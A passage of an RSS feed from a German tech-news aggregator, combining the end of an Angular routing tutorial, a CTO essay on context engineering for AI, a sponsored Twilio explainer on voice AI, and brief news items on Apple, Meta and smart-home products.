<p class="wp-block-paragraph">The providedIn: <code>'root'</code> metadata is important, it tells Angular to create a single, shared instance of this service for the entire application (you might recognize this as an instance of the <a href="https://en.wikipedia.org/wiki/Singleton_pattern">singleton pattern</a>).</p>



<h3 class="wp-block-heading">Using the service</h3>



<p class="wp-block-paragraph">In the past, we had to list dependencies in the constructor. Modern Angular offers a cleaner way: the <code>inject()</code> function. Subsequently, we can refactor our <code>src/app/app.ts</code> to get its data from the service instead of hardcoding it:</p>



<pre class="wp-block-code"><code>import { Component, inject, signal } from '@angular/core';
import { RouterOutlet } from '@angular/router';
import { Frameworks } from './frameworks'; // Import the service

@Component({
  selector: 'app-root',
  imports: [RouterOutlet],
  templateUrl: './app.html',
  styleUrl: './app.css'
})
export class App {
  private frameworksService = inject(Frameworks); // Dependency Injection
  
  protected readonly title = signal('iw-ng');
  
  // Initialize signal with data directly from the service
  protected readonly frameworks = signal(this.frameworksService.getList());
  protected showList = signal(true);

  toggleList() {
    this.showList.update(v =&gt; !v);
  }
}</code></pre>



<p class="wp-block-paragraph">Dependency injection is a powerful pattern. The component doesn’t need to know where the list came from (it could be coming from an API, a database, or a hard-coded array); it just asks the service for what it needs. This pattern adds a bit of extra work up front, but it delivers a more flexible, organized codebase as the app grows in size and complexity.</p>



<h2 class="wp-block-heading">Routers and routes</h2>



<p class="wp-block-paragraph">Once your application grows beyond a single view, you need a way to navigate between different screens. In Angular, we use the built-in router for this purpose. In our example project, <code>src/app/app.routes.ts </code>is the dedicated home for the router config. Let’s follow the steps for creating a new route.</p>



<p class="wp-block-paragraph">First, we define the route. When you open <code>src/app/app.routes.ts</code>, you will see an exported routes array. This array contains the available routes for your app. Each string name resolves to a component that handles rendering that route. In effect, this is the map of your application’s landscape.</p>



<p class="wp-block-paragraph">In a real application, you’d often have “framing template” material in the root of the app (like the navbar) and then the routes fill in the body content. (Remember that by default, Angular is designed for single-page apps, where navigation does reload the screen, but swaps content.)</p>



<p class="wp-block-paragraph">For now, let’s just get a sense of how the router works. First, create a new component so we have a destination to travel to. In your terminal, run:</p>



<pre class="wp-block-code"><code>$ ng generate component details</code></pre>



<p class="wp-block-paragraph">This will generate a simple <code>details</code> component in the <code>src/app/details</code> directory.</p>



<p class="wp-block-paragraph">Now we can update <code>src/app/app.routes.ts</code> to include this new path. We will also add a “default” path that redirects empty requests to the home view, ensuring the user always lands somewhere:</p>



<pre class="wp-block-code"><code>import { Routes } from '@angular/router';
import { App } from './app'; // Matches src/app/app.ts
import { Details } from './details/details'; // Matches src/app/details/details.ts

export const routes: Routes = [
  { path: '', redirectTo: '/home', pathMatch: 'full' },
  { path: 'home', component: App },
  { path: 'details', component: Details },
];</code></pre>



<p class="wp-block-paragraph">Now if you visit <code>localhost:4200/home</code>, you’ll get the message from the <code>details</code> component: “Details works!”</p>



<p class="wp-block-paragraph">Next, we’ll use the <code>routerLink</code> directive to move between views without refreshing the page. In <code>src/app/app.html</code>,  we create a navigation bar that sits permanently at the top of the page (the “stationary” element), while the router swaps the content below it (the “impermanent” element):</p>



<pre class="wp-block-code"><code><nav>
  <a>Home</a> | 
  <a>Details</a>
</nav>

<hr>

</code></pre>



<p class="wp-block-paragraph">And with that, the application has a navigation flow. The user clicks, the URL updates, and the content transforms, all without the jarring flicker of a browser reload.</p>



<h2 class="wp-block-heading">Parametrized routes</h2>



<p class="wp-block-paragraph">The last thing we’ll look at is handling route parameters, where the route accepts variables in the path. To manage this kind of dynamic data, you define a route with a variable, marked by a colon. Open <code>src/app/app.routes.ts</code> and add a dynamic path:</p>



<pre class="wp-block-code"><code>export const routes: Routes = [
  // ... existing routes
  { path: 'details/:id', component: Details }, 
];</code></pre>



<p class="wp-block-paragraph">The <code>:id</code> is a placeholder. Whether the URL is <code>/details/42</code> or <code>/details/108</code>, this router will receive it because it matches the path. Inside the details component, we have access to this parameter (using the <a href="https://angular.dev/api/router/ActivatedRoute">ActivatedRoute</a> service or the new <a href="https://angular.dev/api/router/withComponentInputBinding">withComponentInputBinding</a>). We can use that value to retrieve the data we need (like using it to recover a detail item from a database).</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">We have seen the core elements of modern Angular: Setting up the environment, building reactive components with signals, organizing logic with services, and tying it all together with interactive routing.</p>



<p class="wp-block-paragraph">Deploying these pieces together is the basic work in Angular. Once you get comfortable with it, you have an extremely powerful platform at your fingertips. And, when you are ready to go deeper, there is a whole lot more to explore in Angular, including:</p>



<ul class="wp-block-list">
<li>State management: Beyond signals, Angular has support for managing complex, application-wide state.</li>



<li>Forms: Angular has a robust system for handling user input.</li>



<li>Signals: We only scratched the surface of signals here. Signals offer a powerful, fine-grained way to manage state changes.</li>



<li>Build: You can learn more about producing production builds.</li>



<li><a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">RxJS</a>: Takes reactive programming to the next level.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Prepares AirPods-Style Pairing for Meta Glasses and Headsets]]></title>
<description><![CDATA[Apple is building a new tool that will allow third-party accessories to connect across your devices, just like its own audio products do today. This update means gear like the Ray-Ban glasses and Quest headsets from Meta could soon link to your iPhone and instantly become available on your iPad. ...]]></description>
<link>https://tsecurity.de/de/3665547/ios-mac-os/apple-prepares-airpods-style-pairing-for-meta-glasses-and-headsets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665547/ios-mac-os/apple-prepares-airpods-style-pairing-for-meta-glasses-and-headsets/</guid>
<pubDate>Mon, 13 Jul 2026 16:24:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is building a new tool that will allow third-party accessories to connect across your devices, just like its own audio products do today. This update means gear like the Ray-Ban glasses and Quest headsets from Meta could soon link to your iPhone and instantly become available on your iPad. The change stems from recent European tech regulations aimed at opening up closed software systems.



Apple responds to a request from Meta about easier pairing



In October 2025, Meta asked Apple to make its hardware easier to use across multiple screens. Under the European Union Digital Markets Act, the company requested that once a headset or pair of smart glasses connects to a single device, it should automatically work with a user's other screens without needing extra setup.



Apple responded in February, agreeing to build a secure way for third-party apps to handle this process. The new system will use cryptographic materials and require a one-time permission from the user for each accessory. This upgrade aims to give outside hardware the same instant connection treatment that the AirPods and Apple Watch already enjoy.



The new software update might arrive by spring next year



Development of this new pairing tool is expected to wrap up by spring 2027. It will likely roll out as an update to iOS 27, though the exact version number is not yet confirmed. The technology relies on infrastructure built to satisfy European Commission rules, meaning it currently only functions within the European Union.



Meta pointed out a catch with this approach. To use the new system, Meta would have to drop its standard Bluetooth setup, which it uses everywhere else in the world. The company asked to separate the two methods, but Apple declined for now.



However, Apple mentioned it is still thinking about bringing this quick pairing support to countries outside of Europe in the future.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI needs contextual intelligence — not just bigger models]]></title>
<description><![CDATA[A product manager on my team recently asked me where we were seeing the most issues across the engineering team. Instead of guessing, I had an engineering lead point Claude at our Jira via an MCP connector and look at the bug patterns himself.



One team had a wildly disproportionate share of ti...]]></description>
<link>https://tsecurity.de/de/3664720/it-security-nachrichten/why-ai-needs-contextual-intelligence-not-just-bigger-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664720/it-security-nachrichten/why-ai-needs-contextual-intelligence-not-just-bigger-models/</guid>
<pubDate>Mon, 13 Jul 2026 11:08:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A product manager on my team recently asked me where we were seeing the most issues across the engineering team. Instead of guessing, I had an engineering lead point Claude at our Jira via an MCP connector and look at the bug patterns himself.</p>



<p>One team had a wildly disproportionate share of tickets — about 50% of their sprint time was spent on “bugs,” versus roughly 25% for everyone else. The headline number suggested a quality problem.</p>



<p>It wasn’t. When we layered in the context around those tickets, almost none of them were bugs. They were manual workarounds for a missing product capability: customers asking us, one request at a time, to restore items they had accidentally deleted. Not shipping an item restore feature was burning roughly 1.5 engineers’ worth of capacity. I went back to our product team and said, “Build this, and you reclaim a person and a half.”</p>



<p>The analysis took 45 minutes. It was only possible because our data was already organized, tagged by team, connected to contributors, accessible through MCP and protected by role-based access. None of that is “AI.” All of it is the layer underneath AI that almost nobody invests in first. That’s probably because the investment is unglamorous: updating data dictionaries, access controls, team taxonomies, system-to-system mappings. Most of the work has been the same for twenty years. AI just raised the cost of skipping it.<br></p>



<h2 class="wp-block-heading">The intelligence underneath the models</h2>



<p>I keep coming back to the value of context data layers as a CTO in the middle of an AI rollout. I have started calling that value proposition contextual intelligence because I haven’t found a better name. Anthropic’s engineering team has been calling this kind of work “<a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="nofollow">context engineering</a>” since late 2025, and <em>CIO</em><a href="https://www.cio.com/article/4080592/context-engineering-improving-ai-by-moving-beyond-the-prompt.html"> ran its own feature on the term</a> shortly after. Whether you describe it as contextual intelligence or context engineering, it’s the part of the stack where the actual programming work still lives.</p>



<p>If business logic is your company’s official org chart, then contextual intelligence is knowing who actually gets things done, how decisions are actually made and what the unwritten rules are. One is theory. The other is reality.</p>



<p>Most enterprise systems capture the theory. The systems that capture how work actually happens — what people do, how teams operate, where decisions get stuck — are rarer and harder to build. And modern LLMs, it turns out, are useless without both.</p>



<p>I learned this the hard way at a recent company hackathon. Nine engineering teams, one prompt: make our operational dataset more usable through AI. My team built persona-based chatbots (CFO, CIO, sales manager) on top of an MCP server backed by Postgres and our enrichment data. Other teams built dashboard generators, Looker conversational analytics and workflow agents.</p>



<p>The initial demos all had the same problem. Claude could talk to our data, but the answers were either generic or confidently wrong. The CFO persona would happily report a “spend trend” that quietly conflated two distinct cost categories across two different tables. The CIO persona would answer questions about team productivity, but the averages across roles should never have been aggregated. The sales manager persona returned answers that were technically correct against the schema and completely wrong against the business. The raw data was rich. The context layer around it didn’t exist yet. Chatting with raw data is not an AI product. It’s a demo.</p>



<p>One of my senior engineers spent the second day ripping out the agent’s direct database connection. He stopped trying to prompt-engineer the LLM to understand our business and instead codified that logic into the data pipeline. Working backward from the failed CFO answers, he mapped out the implicit knowledge an experienced controller relies on: Explicitly defining which legacy tables actually represent ‘spend,’ writing the rules for currency normalization and hardcoding our fiscal time windows. He built a series of semantic SQL views to enforce these rules and restricted the MCP server to exposing only this curated layer. When we pointed the same model at those same questions, it returned completely different answers. They were specific, evidence-based and grounded in our actual business reality. The model didn’t get smarter. The engineering beneath it did.</p>



<h2 class="wp-block-heading">The same pattern shows up everywhere I look right now</h2>



<p><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/one-year-of-agentic-ai-six-lessons-from-the-people-doing-the-work" rel="nofollow">McKinsey</a> keeps publishing that software development tops enterprise AI use cases, with companies reporting 30–50% productivity gains in pilots. The pilot numbers are real. They rarely translate to top- or bottom-line impact in production. Our own company data tells the same story: Between Q1 2025 and Q1 2026, our total AI tool usage grew by 328% (over 4x). Over that same period, PR throughput grew by just 49%.</p>



<p>That gap — adoption way up, outcomes inching along — is the context gap. Plug a generic agent into raw, uninterpreted data, and it will act inefficiently at best, harmfully at worst. An agent optimizing sales without your customer segmentation or product hierarchy will confidently recommend the wrong thing. Anthropic<a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="nofollow"> </a><a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="nofollow">framed the shift directly</a>: building with language models is becoming “less about finding the right words and phrases for your prompts, and more about answering the broader question of what context configuration is most likely to generate our model’s desired behavior.” That second question — what context configuration  — is the entire game. Most organizations are still answering the first one.</p>



<h2 class="wp-block-heading">Where the work actually lives</h2>



<p>A growing number of CTOs I talk to are shifting their AI investments accordingly. Less attention on the model. More on the layer between the model and the data.</p>



<p>When peers ask me what that actually looks like day-to-day, I tell them I give every engineering role the same mandate: the LLM should never see raw, uncontextualized data.</p>



<p>In practice, that breaks down to three pieces of work, none of them glamorous.</p>



<p>The first is semantic middleware. We need code that transforms raw data into business-meaningful signals before it ever reaches the model. Our feature stores hold things like “employee code velocity on critical-path features,” not “X logged 50 Git commits.” The work of figuring out what “critical-path” means in our product, in our org, on this team is the work. It does not get cheaper because the model has gotten better.</p>



<p>The second is multi-agent design. Instead of one omniscient orchestrator, we run smaller agents scoped to specific domains, each with rules that catch the failure modes the main model is known for. We pair them with RAG that retrieves precomputed insights, with their rules attached, rather than raw documents. Validation checkpoints sit between steps and flag suggestions that violate known constraints, such as averaging productivity across completely different job functions. The guardrails are not there to be clever. They are there because we already watched the model make those exact mistakes.</p>



<p>The third is evaluation that takes business logic seriously. When I look at a model, general benchmark accuracy is the least interesting number. I want to know whether it respects our constraints and integrates cleanly with our existing architecture. That sometimes means fine-tuning our patterns, sometimes constitutional approaches to embed principles, sometimes hybrid systems where deterministic rules sit alongside the probabilistic ones. The throughline is the same: validate against reality, not against the benchmark.</p>



<h2 class="wp-block-heading">Why this matters now</h2>



<p>The reason this matters more now than it did six months ago is that adoption is moving faster than measurement, let alone integration. Model Evaluation &amp; Threat Research’s (<a href="https://metr.org/" rel="nofollow">METR</a>) developer productivity work tells the story in a way they didn’t intend. In early 2025, they<a href="https://arxiv.org/pdf/2507.09089" rel="nofollow"> ran a controlled study</a> and found AI tools slowed experienced open-source developers by 19%. When they tried to<a href="https://metr.org/blog/2026-02-24-uplift-update/" rel="nofollow"> repeat the study in late 2025</a>, the experiment broke. Thirty to fifty percent of developers refused to submit tasks under the no-AI condition. They wouldn’t accept working without their tools. METR is now redesigning the study because the original methodology no longer holds up against how developers actually work. That’s how fast adoption moved. But I’d be willing to bet the organizational scaffolding required to convert that adoption into outcomes — context layers, workflow redesign, retraining around new tools — moved nowhere near as fast.</p>



<h2 class="wp-block-heading">Get ahead with context </h2>



<p>The teams I’ve seen succeed with AI built the context layer first. The teams I’ve seen struggle eventually built in context anyway, just at higher cost and with more scar tissue. Raw data is the new currency. But raw data without a context layer is cash sitting in a vault. It cannot act on anything. The difference between insight and noise is a layer of code that understands what your data means.</p>



<p>That layer is the work. It is where the next decade of competitive advantage will sit. And in my experience, the organizations that build it first are the ones that will actually get the productivity gains the rest of the market keeps promising.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Voice AI vs conversational AI: What’s the difference?]]></title>
<description><![CDATA[Voice AI. Conversational AI. You’ve seen both terms everywhere—sometimes in the same sentence, sometimes used as if they mean the same thing.



They don’t. But they’re not opposites either.



One is a category of technology. The other is a specific way to deliver it.



Mix them up and you end ...]]></description>
<link>https://tsecurity.de/de/3664597/it-security-nachrichten/voice-ai-vs-conversational-ai-whats-the-difference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664597/it-security-nachrichten/voice-ai-vs-conversational-ai-whats-the-difference/</guid>
<pubDate>Mon, 13 Jul 2026 10:09:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Voice AI. Conversational AI. You’ve seen both terms everywhere—sometimes in the same sentence, sometimes used as if they mean the same thing.</p>



<p>They don’t. But they’re not opposites either.</p>



<p>One is a category of technology. The other is a specific way to deliver it.</p>



<p>Mix them up and you end up making the wrong platform decisions, building the wrong workflows, and losing 45 minutes in a meeting that didn’t need to happen.</p>



<p>Here’s the difference between voice AI and conversational AI, minus the jargon.</p>



<h2 class="wp-block-heading">Conversational AI: The intelligence layer</h2>



<p><a href="https://www.twilio.com/en-us/blog/what-is-conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Conversational AI</a> is the broader category. It refers to any AI system designed to understand human language, reason about what was said, and respond in a way that feels natural and contextually relevant. That exchange can happen through text, voice, or any other medium.</p>



<p>What defines conversational AI is the intelligence underneath the interaction:</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/docs/glossary/what-is-natural-language-understanding?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Natural language understanding</a> that interprets intent rather than matching keywords</li>



<li>Dialogue management that tracks what’s been said and what still needs to be resolved</li>



<li>Response generation that produces output appropriate to the context.</li>
</ul>



<p>Conversational AI shows up in a lot of forms. A chatbot on a support page is conversational AI. An AI assistant that helps a sales rep draft follow-up emails is conversational AI. A virtual agent that handles inbound customer inquiries is conversational AI.</p>



<p>The intelligence layer makes the interaction feel like a conversation rather than a database lookup.</p>



<p>The channel, the modality, the interface: those are separate from the intelligence. Which brings us to voice AI.</p>



<h2 class="wp-block-heading">Voice AI: The delivery method</h2>



<p><a href="https://www.twilio.com/en-us/blog/insights/what-is-voice-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Voice AI</a> is conversational AI delivered through spoken language. It’s the application of conversational AI intelligence to voice-based interactions <strong>where the input is speech and the output is speech.</strong></p>



<p>A voice AI system:</p>



<ul class="wp-block-list">
<li>Takes spoken words</li>



<li>Converts them to text via <a href="https://www.twilio.com/en-us/speech-recognition?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">speech-to-text (STT)</a></li>



<li>Runs that text through a <a href="https://www.twilio.com/en-us/products/conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">conversational AI layer</a> to understand intent and generate a response</li>



<li>Converts that response back to spoken audio via <a href="https://www.twilio.com/en-us/blog/insights/ai/what-is-text-to-speech?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">text-to-speech (TTS)</a></li>
</ul>



<p>And it does it all fast enough that the conversation doesn’t feel like it’s buffering.</p>



<p>Voice AI isn’t a fundamentally different kind of intelligence from conversational AI. It’s conversational AI with a voice interface wrapped around it. The reasoning, the context tracking, the dialogue management—those are the same capabilities.</p>



<p>What voice AI adds is the ability to operate through spoken language in real time, with all the additional complexity that introduces: handling interruptions, managing turn-taking, producing natural-sounding speech, and doing all of it with sub-500ms latency.</p>



<p>Ultimately, conversational AI is how the system thinks. Voice AI is how it talks.</p>



<h2 class="wp-block-heading">How they relate</h2>



<p>Voice AI depends on conversational AI to be useful. Without the intelligence layer (intent recognition, context tracking, and coherent response generation), a voice system is just a phone menu with better audio.</p>



<p>The voice interface makes the interaction accessible through speech. The conversational AI makes the interaction worth having.</p>



<p>The relationship goes one way, though.</p>



<p>Every voice AI system uses conversational AI underneath it. But conversational AI doesn’t require voice. A text-based chatbot, messaging bot, or AI assistant embedded in a ticketing system are conversational AI without any voice component.</p>



<p>It’s not really a question of whether you need conversational AI or voice AI. It’s better to ask: does your use case require voice?</p>



<ul class="wp-block-list">
<li>If yes, you need voice AI—which means you also need conversational AI as the foundation.</li>



<li>If the interaction is text-based, you need conversational AI without the voice layer.</li>
</ul>



<h2 class="wp-block-heading"><a></a>Voice AI vs. conversational AI: Key differences</h2>



<p>Side by side, the differences get a lot clearer. Here’s the breakdown across the criteria that matter most for teams building or buying AI for customer service.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/image_b3a549.png" alt="" class="wp-image-4194915" width="630" height="556" sizes="auto, (max-width: 630px) 100vw, 630px"></figure></div>



<h2 class="wp-block-heading">When to use conversational AI without voice</h2>



<p>Text-based conversational AI makes sense when your customers primarily engage through chat, messaging, or digital channels. And when the nature of the interaction doesn’t require the immediacy of a phone call.</p>



<ul class="wp-block-list">
<li>Support chat on a website</li>



<li>WhatsApp automation</li>



<li>AI-assisted email triage</li>



<li>Messaging bots for transactional notifications</li>
</ul>



<p>These are all conversational AI use cases where voice doesn’t add much and may introduce unnecessary friction. Not every customer wants to speak out loud, especially in public, at work, or when the question is simple enough to type in thirty seconds.</p>



<p>Text-based conversational AI is also typically faster to deploy, easier to test, and simpler to update. You can iterate on response quality, test new flows, and review transcripts without dealing with audio quality, latency optimisation, or the additional infrastructure that voice requires.</p>



<p>If your primary support and engagement channels are digital and your customers are comfortable typing, starting with text-based conversational AI often makes more sense than jumping straight to voice.</p>



<h2 class="wp-block-heading"><a></a>When you need voice AI specifically</h2>



<p>Voice AI makes sense when the use case is inherently telephonic, time-sensitive, or requires the kind of nuance that text alone doesn’t capture.</p>



<ul class="wp-block-list">
<li><strong>Inbound phone support: </strong>Customers call because they want to talk to someone, or because they’ve always called, or because the issue feels urgent enough that they don’t want to wait for a chat response. An AI that can answer that call, understand the issue, and resolve it in the same interaction replaces one of the most expensive and frustrating moments in customer service.</li>



<li><strong>Outbound calling:</strong> Appointment reminders, fraud alerts, lead follow-up, proactive outreach for at-risk customers. These interactions are harder to execute over text because they require real-time dialogue.</li>



<li><strong>Context:</strong> Tone, urgency, frustration, hesitation—these are signals that a voice AI system can detect and respond to. A customer who speaks with audible frustration is communicating something beyond the literal words, and a well-designed voice AI system can adjust its approach accordingly.</li>
</ul>



<p>Finally, voice AI matters when your customers are less likely to engage through digital channels. These might be older demographics, industries where phone is still the primary contact method, or use cases where hands-free interaction is a practical requirement.</p>



<h2 class="wp-block-heading">Do you need both?</h2>



<p>For most businesses building serious customer engagement infrastructure: yes.</p>



<p>The customers who prefer chat aren’t going away. Neither are the customers who pick up the phone. A complete AI engagement strategy handles both with a single connected experience rather than two separate systems that don’t know about each other.</p>



<p>And that’s where <a href="https://www.twilio.com/en-us/products/conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Conversations</a> can help.</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversation-orchestrator?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Orchestrator</a> connects voice, SMS, WhatsApp, and chat into one continuous conversation record.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversation-memory?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Memory</a> gives every agent (AI or human) persistent customer context across channels.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversationrelay?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Relay</a> handles the voice AI layer: low-latency STT and TTS, bring-your-own-LLM, HIPAA-eligible.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai#:~:text=and%20barge-in.-,Agent%20Connect,-Connect%20your%20own?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Agent Connect</a> lets you plug your own AI agents into Twilio channels without rebuilding your communications infrastructure.</li>
</ul>



<p>Your customers are going to use both voice and text. The question is whether your stack connects them.</p>



<p><a href="https://www.twilio.com/try-twilio?ext-anonymousId=1d804104-edbe-49b6-aed2-edb162421f5b&amp;ext-gaClientId=589905313.1777306679&amp;ext-gaSessionId=1778509973&amp;utm_referrer=https%3A%2F%2Fwww.twilio.com%2Fen-us%2Fproducts%2Fconversational-ai&amp;utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Start for free</a> or <a href="https://www.twilio.com/en-us/help/sales?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">contact sales</a> to talk through your use case.</p>



<h2 class="wp-block-heading">Frequently asked questions</h2>



<h3 class="wp-block-heading"><strong>What’s the difference between voice AI and conversational AI?</strong></h3>



<p>Conversational AI is the intelligence layer that understands human language and generates contextually relevant responses, regardless of channel. Voice AI is conversational AI delivered through spoken language. It adds speech-to-text and text-to-speech components so the interaction happens via voice.</p>



<h3 class="wp-block-heading"><strong>Is voice AI a type of conversational AI?</strong></h3>



<p>Yes. Voice AI is a specific application of conversational AI that operates through spoken language. The reasoning, intent recognition, and dialogue management capabilities come from conversational AI. Voice AI adds the speech interface on top to convert spoken input to text, process it through the conversational AI layer, and convert the response back to speech.</p>



<h3 class="wp-block-heading"><strong>Can conversational AI work without voice?</strong></h3>



<p>Yes. Text-based chatbots, messaging bots, AI assistants in ticketing systems, and email AI are all forms of conversational AI that don’t use voice.</p>



<h3 class="wp-block-heading"><strong>Does Twilio support both voice AI and conversational AI?</strong></h3>



<p>Yes. Twilio Conversation Relay handles voice AI, combining low-latency STT and TTS with bring-your-own-LLM flexibility. The broader Twilio Conversations platform connects voice, SMS, WhatsApp, and chat into a single conversation layer, so the conversational AI intelligence and customer context are shared across every channel.</p>



<p>To learn more about Twilio conversations, visit <a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">here</a>.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p><a></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Philips Hue got the smart home right]]></title>
<description><![CDATA[The state of the smart home can be frustrating, because it is just so obvious how things ought to work. You should be able to control everything from everywhere. Your spaces should adapt to what you're doing and how you're feeling. Making your home smart shouldn't require renovating, and the smar...]]></description>
<link>https://tsecurity.de/de/3663432/it-nachrichten/how-philips-hue-got-the-smart-home-right/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663432/it-nachrichten/how-philips-hue-got-the-smart-home-right/</guid>
<pubDate>Sun, 12 Jul 2026 16:46:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The state of the smart home can be frustrating, because it is just so obvious how things ought to work. You should be able to control everything from everywhere. Your spaces should adapt to what you're doing and how you're feeling. Making your home smart shouldn't require renovating, and the smarts should be mostly invisible. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Spionageaktion: Nato-Transportwege mit gehackten Kameras ausgespäht - Golem.de]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... SecuritySicherheitslückeCybercrimeRussland. Weitere interessante Artikel ...]]></description>
<link>https://tsecurity.de/de/3662459/it-security-nachrichten/spionageaktion-nato-transportwege-mit-gehackten-kameras-ausgespaeht-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662459/it-security-nachrichten/spionageaktion-nato-transportwege-mit-gehackten-kameras-ausgespaeht-golemde/</guid>
<pubDate>Sat, 11 Jul 2026 23:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... <b>Security</b>SicherheitslückeCybercrimeRussland. Weitere interessante Artikel ...]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Rotten to its core’ — Apple files an explosive lawsuit against OpenAI]]></title>
<description><![CDATA[Apple surprised the tech industry after financial markets closed Friday with news the company has sued OpenAI, alleging theft of trade secrets for ChatGPT hardware. The lawsuit particularly targets some senior ex-Apple employees now working at OpenAI.



Apple’s suit names two former employees — ...]]></description>
<link>https://tsecurity.de/de/3661897/it-nachrichten/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai/</link>
